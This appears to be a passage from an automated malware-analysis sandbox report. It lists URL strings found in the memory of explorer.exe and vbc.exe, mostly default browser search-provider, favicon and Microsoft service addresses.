Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000007.00000000.2213864870.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000005.00000002.2184986711.0000000002231000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000007.00000000.2196684735.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000007.00000000.2194228634.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2206072148.0000000008471000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000007.00000000.2213126669.00000000002BB000.00000004.00000020.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000007.00000000.2193837083.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico.
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2210682045.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000007.00000000.2196107668.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000007.00000000.2194228634.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.2210682045.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000007.00000000.2213864870.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2196107668.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000007.00000000.2194004284.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2194228634.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.2196107668.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2205990813.000000000842E000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000007.00000000.2205990813.000000000842E000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000007.00000000.2205990813.000000000842E000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehpi
Source: explorer.exe, 00000007.00000000.2194004284.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
